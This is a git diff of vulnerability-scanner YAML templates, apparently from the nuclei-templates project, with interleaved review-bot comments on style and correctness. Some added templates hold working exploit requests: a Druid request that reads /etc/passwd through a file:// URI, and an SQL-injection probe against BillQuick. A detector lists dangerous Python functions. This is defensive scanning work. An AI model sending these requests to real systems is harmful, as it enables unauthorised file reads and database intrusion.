diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml
index a158694063..705f870c7e 100644
--- a/.github/workflows/template-validate.yml
+++ b/.github/workflows/template-validate.yml
@@ -20,10 +20,8 @@ jobs:
- name: Installing Nuclei
# if: steps.cache-go.outputs.cache-hit != 'true'
- env:
- GO111MODULE: on
run: |
- go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
+ go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
shell: bash
- name: Template Validation
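Review bot: The new `go install …/cmd/nuclei@latest` line resolves to whatever the newest tagged release is at the moment the job runs, so the validation step is no longer reproducible and will silently adopt any future release, including one published by mistake or by a compromised maintainer account. Pin the module to a concrete tag and bump it deliberately, e.g. `go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@<pinned-tag>`, so a behaviour change in the validator shows up as a reviewed diff rather than as a surprise red build. The removed `@dev` had the same drift problem on a branch, so this is a change of intent rather than a regression; dropping `GO111MODULE: on` is fine for a modern toolchain. The commented-out `if:` on the cache step above the hunk suggests caching was once tied to this step — worth confirming it still makes sense with a pinned version.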
diff --git a/README.md b/README.md
index 47d02bb65e..46fe32d081 100644
--- a/README.md
+++ b/README.md
@@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags,
| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | |
| cve2020 | 166 | madrobot | 63 | file | 50 | | | | |
-**176 directories, 2418 files**.
+**177 directories, 2443 files**.
diff --git a/cves/2021/CVE-2021-36749.yaml b/cves/2021/CVE-2021-36749.yaml
new file mode 100644
index 0000000000..c0f1e3224e
--- /dev/null
+++ b/cves/2021/CVE-2021-36749.yaml
@@ -0,0 +1,35 @@
+id: CVE-2021-36749
+
+info:
+ name: Apache Druid Authentication Restrictions Bypass
+ author: _0xf4n9x_
+ severity: medium
+ description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-36749
+ - https://www.cvedetails.com/cve/CVE-2021-36749/
+ - https://github.com/BrucessKING/CVE-2021-36749
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 6.5
+ cve-id: CVE-2021-36749
+ cwe-id: CWE-668
+ tags: cve,cve2021,apache,lfi,auth-bypass
+
+requests:
+ - raw:
+ - |
+ POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+ - "druid:*:1000:1000:"
+ condition: or
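Review bot: The second regex `"druid:*:1000:1000:"` does not match what it appears to target — `:*` quantifies the colon, so the pattern only matches `druid` followed directly by zero or more colons and then `:1000:1000:`, never an entry that has a field between the name and the uid; the first regex uses `.*` for that gap, so this was presumably meant as `"druid:.*:1000:1000:"`. Separately, the classification block is internally inconsistent: the vector `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` evaluates to 8.8 (high) under CVSS 3.1, while `cvss-score: 6.5` and `severity: medium` say otherwise, so one of the two should be corrected against the NVD entry referenced above. `matchers-condition: and` with a single matcher is harmless but redundant.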
diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml
new file mode 100644
index 0000000000..64def1d504
--- /dev/null
+++ b/cves/2021/CVE-2021-42258.yaml
@@ -0,0 +1,64 @@
+id: CVE-2021-42258
+
+info:
+ name: BillQuick Web Suite SQLi
+ author: dwisiswant0
+ severity: high
+ tags: cve,cve2021,sqli,billquick
+ description: |
+ BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
+ allows SQL injection for unauthenticated remote code execution,
+ as exploited in the wild in October 2021 for ransomware installation.
+ SQL injection can, for example, use the txtID (aka username) parameter.
+ Successful exploitation can include the ability to execute
+ arbitrary code as MSSQLSERVER$ via xp_cmdshell.
+ reference:
+ - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-42258
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Referer: {{BaseURL}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+
+ __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
+
+ cookie-reuse: true
+ extractors:
+ - type: xpath
+ name: VS
+ internal: true
+ attribute: value
+ xpath:
+ - "/html/body/form/div/input[@id='__VIEWSTATE']"
+
+ - type: xpath
+ name: VSG
+ internal: true
+ attribute: value
+ xpath:
+ - "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"
+
+ - type: xpath
+ name: EV
+ internal: true
+ attribute: value
+ xpath:
+ - "/html/body/form/div/input[@id='__EVENTVALIDATION']"
+
+ matchers:
+ - type: word
+ part: body
+ condition: and
+ words:
+ - "System.Data.SqlClient.SqlException"
+ - "Incorrect syntax near"
+ - "_ACCOUNTLOCKED"
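Review bot: This template has no `classification` block, unlike the sibling `cves/2021/CVE-2021-36749.yaml` added in the same commit, so consumers that key on `cve-id` cannot correlate it; add under `info` the lines `classification:`, `  cve-id: CVE-2021-42258` and a `cvss-metrics`/`cvss-score` pair taken from the NVD reference already listed. `severity: high` also sits oddly with the description's own wording of unauthenticated remote code execution exploited in the wild — worth confirming against the NVD rating rather than assuming either way. The three `xpath` extractors use absolute paths rooted at `/html/body/form/div`, which is brittle; if any one fails the `§VS§`/`§VSG§`/`§EV§` placeholders are presumably sent through unsubstituted, so a one-line comment above `extractors:` noting that the second request depends on all three would help the next maintainer.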
diff --git a/exposed-panels/redis-commander-exposure.yaml b/exposed-panels/redis-commander-exposure.yaml
new file mode 100644
index 0000000000..0a0ee65364
--- /dev/null
+++ b/exposed-panels/redis-commander-exposure.yaml
@@ -0,0 +1,22 @@
+id: redis-commander-exposure
+
+info:
+ name: Redis Commander Exposure
+ author: dahse89
+ severity: low
+ reference:
+ - https://joeferner.github.io/redis-commander/
+ - https://github.com/joeferner/redis-commander
+ tags: panel,redis
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers:
+ - type: word
+ condition: and
+ words:
+ - "
Redis Commander"
+ - "redisCommanderBearerToken"
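Review bot: Lines 161–162 show the first `words` literal split across a line break (`"` on one line, `Redis Commander"` on the next); if that break is really in the file, YAML folds it into a space and the matcher looks for ` Redis Commander` with a leading space, which weakens the match — if it is a rendering artifact (an HTML tag lost from the page), ignore this. This new template also lacks the `description` field that the rest of this commit adds across the corpus; a minimal one grounded in what the matchers check would be `description: A Redis Commander web management interface was detected on the target.` The matchers have no `part:` set, which relies on the default rather than stating it; `part: body` makes the intent explicit.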
diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml
index 6f7b8770d6..c949abfae5 100644
--- a/file/python/python-scanner.yaml
+++ b/file/python/python-scanner.yaml
@@ -4,7 +4,7 @@ info:
name: Python Scanner
author: majidmc2
severity: info
- description: Scan for dangerous Python functions
+ description: Indicators for dangerous Python functions
reference:
- https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html
- https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html
@@ -17,7 +17,7 @@ file:
extractors:
- type: regex
- name: Possible Code Injection
+ name: code-injection
regex:
- 'exec'
- 'eval'
@@ -25,7 +25,7 @@ file:
- type: regex
- name: Possible Command Injection
+ name: command-injection
regex:
- 'subprocess.call\(.*shell=True.*\)'
- 'os.system'
@@ -33,18 +33,18 @@ file:
- type: regex
- name: Possibly Unpickling untrusted source
+ name: untrusted-source
regex:
- 'pickle.loads'
- 'cPickle.loads'
- type: regex
- name: Possibly loading dangerous YAMLs
+ name: dangerous-yaml
regex:
- 'yaml.load'
- type: regex
- name: Possible SQLi
+ name: sqli
regex:
- - 'cursor.execute'
+ - 'cursor.execute'
\ No newline at end of file
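Review bot: The rewritten last line `- 'cursor.execute'` now ends without a trailing newline (the `\ No newline at end of file` marker applies to the added side), which yamllint flags under `new-line-at-end-of-file` and which makes every future append to this file show up as a two-line diff; restore the newline. The rename to `name: untrusted-source` drops the one word that made the old name meaningful — the regexes under it are `pickle.loads`/`cPickle.loads` — so `name: unsafe-pickle` (or similar) keeps the extractor self-describing in output, consistent with `dangerous-yaml` just below it.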
diff --git a/vulnerabilities/other/solar-log-authbypass.yaml b/vulnerabilities/other/solar-log-authbypass.yaml
index 382d65e232..7e3f5cd21d 100644
--- a/vulnerabilities/other/solar-log-authbypass.yaml
+++ b/vulnerabilities/other/solar-log-authbypass.yaml
@@ -4,7 +4,7 @@ info:
name: Solar-Log 500 2.8.2 - Incorrect Access Control
author: geeknik
severity: high
- description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers>
+ description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server
reference: https://www.exploit-db.com/exploits/49986
tags: solarlog,auth-bypass
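Review bot: The restored description on the added line is missing the infinitive: `…which allows arbitrary remote attackers to gain administrative privileges by connecting to the server.` The previous version was truncated at `attackers>`, so rewriting it is the right fix; it only needs the `to` and a terminating period.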
diff --git a/vulnerabilities/other/ueditor-file-upload.yaml b/vulnerabilities/other/ueditor-file-upload.yaml
index 07225c62db..733c46e297 100644
--- a/vulnerabilities/other/ueditor-file-upload.yaml
+++ b/vulnerabilities/other/ueditor-file-upload.yaml
@@ -3,6 +3,7 @@ info:
name: UEditor Arbitrary File Upload
author: princechaddha
severity: high
+ description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code.
reference:
- https://zhuanlan.zhihu.com/p/85265552
- https://www.freebuf.com/vuls/181814.html
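Review bot: The added description reads awkwardly at the end (`to make the application to execute their content as code`) and joins two clauses with a comma; suggested: `description: UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, which can in turn lead to the uploaded content being executed as code.` One sentence is enough here and matches the shape of the other descriptions added in this commit.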
diff --git a/vulnerabilities/other/unauth-spark-api.yaml b/vulnerabilities/other/unauth-spark-api.yaml
index 8a936e9aa0..56ccbcbe76 100644
--- a/vulnerabilities/other/unauth-spark-api.yaml
+++ b/vulnerabilities/other/unauth-spark-api.yaml
@@ -3,6 +3,7 @@ info:
name: Unauthenticated Spark REST API
author: princechaddha
severity: medium
+ description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it.
reference: https://xz.aliyun.com/t/2490
tags: spark,unauth
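Review bot: Typo on the added line: `accesing` → `accessing`. `does not appear to prevent` is hedged wording for a detection template whose matchers (outside this hunk) decide the result; `does not prevent unauthenticated users from accessing it` reads cleaner.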
diff --git a/vulnerabilities/other/viewlinc-crlf-injection.yaml b/vulnerabilities/other/viewlinc-crlf-injection.yaml
index c1e677dcb7..199d945cd7 100644
--- a/vulnerabilities/other/viewlinc-crlf-injection.yaml
+++ b/vulnerabilities/other/viewlinc-crlf-injection.yaml
@@ -4,6 +4,7 @@ info:
name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
author: geeknik
severity: low
+ description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned.
reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
tags: crlf,viewlinc
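Review bot: The added description is a comma splice that says the same thing twice (`inject a CRLF character into the responses … this allows attackers to inject arbitrary HTTP headers into the response returned`); suggested: `description: The viewLinc application allows remote attackers to inject CRLF sequences into its responses, which in turn allows arbitrary HTTP headers to be injected into the response.` The `name` line above already carries the version detail, so the description does not need to repeat it.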
diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml
index 6f612b4f78..a59b7b3bd1 100644
--- a/vulnerabilities/other/vpms-auth-bypass.yaml
+++ b/vulnerabilities/other/vpms-auth-bypass.yaml
@@ -4,6 +4,7 @@ info:
name: Vehicle Parking Management System 1.0 - Authentication Bypass
author: dwisiswant0
severity: high
+ description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter.
reference: https://www.exploit-db.com/exploits/48877
tags: auth-bypass
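Review bot: The added description states the bypass is via SQL injection in the 'password' parameter, but the `tags` line below it stays `auth-bypass` only; add `sqli` so the template is found by the same tag filter as `cves/2021/CVE-2021-42258.yaml` in this commit: `tags: auth-bypass,sqli`. The `requests:` section the description refers to starts at the last context line and continues outside the hunk.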
requests:
diff --git a/vulnerabilities/other/webui-rce.yaml b/vulnerabilities/other/webui-rce.yaml
index 82d1fab54a..384fe2d49f 100644
--- a/vulnerabilities/other/webui-rce.yaml
+++ b/vulnerabilities/other/webui-rce.yaml
@@ -3,6 +3,7 @@ info:
name: WebUI 1.5b6 RCE
author: pikpikcu
severity: critical
+ description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.
reference: https://www.exploit-db.com/exploits/36821
tags: webui,rce
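Review bot: Grammar on the added line: `endpoint contain` → `endpoint contains`; suggested: `description: WebUI's 'mainfile.php' endpoint contains a vulnerability that allows remote attackers to execute arbitrary code via the 'Logon' parameter.` Dropping `cause it to` keeps the sentence in the same active voice as the other descriptions added in this commit.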
diff --git a/vulnerabilities/other/wems-manager-xss.yaml b/vulnerabilities/other/wems-manager-xss.yaml
index b73ec6dc84..db201ad502 100644
--- a/vulnerabilities/other/wems-manager-xss.yaml
+++ b/vulnerabilities/other/wems-manager-xss.yaml
@@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: medium
tags: xss
-
+ description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter.
reference:
- https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html
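Review bot: The added description has `the response return by the server` → `returned`, and `Javascript` → `JavaScript`; suggested: `description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary JavaScript into the response returned by the server via the 'email' parameter of the '/guest/users/forgotten' endpoint.` Placing the field between `tags` and `reference` also differs from every other file in this commit, where `description` sits right after `severity`; the blank line the hunk removes was the only separator there, so moving the field up keeps `info` in the usual order.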
diff --git a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
index 1c669ac324..6225458a19 100644
--- a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
+++ b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
@@ -4,6 +4,7 @@ info:
name: SMTP WP Plugin Directory listing enabled
author: PR3R00T
severity: high
+ description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access.
reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
tags: wordpress,wp-plugin
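Review bot: Typo on the added line: `acccessible` → `accessible`. `has its 'easy-wp-smtp' folder remotely accessible and its content available for access` also says the same thing twice; `has directory listing enabled on its 'easy-wp-smtp' folder, exposing the files it contains` matches the template name two lines above.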
diff --git a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
index d649437101..4b8b194cfc 100644
--- a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
+++ b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
@@ -4,6 +4,7 @@ info:
name: WordPress Attitude Themes 1.1.1 Open Redirection
author: 0x_Akoko
severity: low
+ description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.
reference: https://cxsecurity.com/issue/WLB-2020030183
tags: wordpress,wp-theme,redirect
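Review bot: Subject/verb mismatch on the added line: `The WordPress Attitude Themes allows` → `The WordPress Attitude theme allows`. The same construction appears in the `weekender-newspaper-open-redirect.yaml` hunk below (`The WordPress Weekender Newspaper Themes allows` → `theme allows`), and that file's `tags` line says `wp-plugin` while its `name` calls it a theme — not introduced by this commit, but worth fixing while the file is open.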
diff --git a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml
index 64d1b30634..c7641f841a 100644
--- a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml
+++ b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml
@@ -4,6 +4,7 @@ info:
name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection
author: 0x_Akoko
severity: low
+ description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL.
reference: https://cxsecurity.com/issue/WLB-2020040103
tags: wordpress,wp-plugin,redirect
diff --git a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
index 683cf92dc3..226a87797b 100644
--- a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
+++ b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
@@ -3,6 +3,7 @@ info:
name: WordPress accessible wp-config
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
severity: high
+ description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading.
tags: wordpress,backup
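Review bot: The added description quotes the file name with backticks (`` `wp-config` ``) whereas every other description in this commit uses single quotes for file and parameter names; use `'wp-config.php'` for consistency and to name the actual file. The request that fetches it (outside this hunk) is what decides the exact path, so confirm the name matches what the template requests.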
requests:
diff --git a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml
index 63829a085e..e4cb6515af 100644
--- a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml
@@ -4,6 +4,7 @@ info:
name: WordPress Oxygen-Theme Themes LFI
author: 0x_Akoko
severity: high
+ description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter.
tags: wordpress,wp-theme,lfi
reference: https://cxsecurity.com/issue/WLB-2019030178
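Review bot: `in its 'download.php' and 'file' parameter` mixes an endpoint and a parameter into one phrase; suggested: `description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in the 'file' parameter of its 'download.php' endpoint.` This file also orders `tags` before `reference`, the reverse of the other WordPress templates in the commit — a style point only, the values are unchanged.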
diff --git a/vulnerabilities/wordpress/wp-upload-data.yaml b/vulnerabilities/wordpress/wp-upload-data.yaml
index 8539ff6058..9a474dff0a 100644
--- a/vulnerabilities/wordpress/wp-upload-data.yaml
+++ b/vulnerabilities/wordpress/wp-upload-data.yaml
@@ -4,7 +4,7 @@ info:
name: wordpress-upload-data
author: pussycat0x
severity: medium
- description: Searches for Passwords in the wordpress uploads directory.
+ description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it.
reference: https://www.exploit-db.com/ghdb/7040
tags: wordpress,listing